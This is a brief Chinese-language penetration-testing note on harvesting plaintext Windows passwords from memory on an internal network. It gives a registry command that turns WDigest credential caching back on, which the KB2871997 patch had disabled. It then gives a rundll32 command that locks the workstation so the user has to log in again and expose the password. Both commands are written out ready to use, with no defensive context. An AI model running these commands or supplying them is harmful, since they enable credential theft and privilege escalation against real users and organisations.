内网------高权限密码抓取
微软发布了KB2871997补丁,⽤来关闭Win7和08的Wdigest功能,同时Server2012版以上默认关闭该功能,但是仍然可以通过修改注册表的⽅法来⼿动开启。
需要修改注册表。
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v
UseLogonCredential /t REG_DWORD /d 1 /f
但是修改完想抓到用户名密码,需要用户再输入一次才能抓到。
锁屏命令
CMD版本:
rundll32.exe user32.dll,LockWorkStation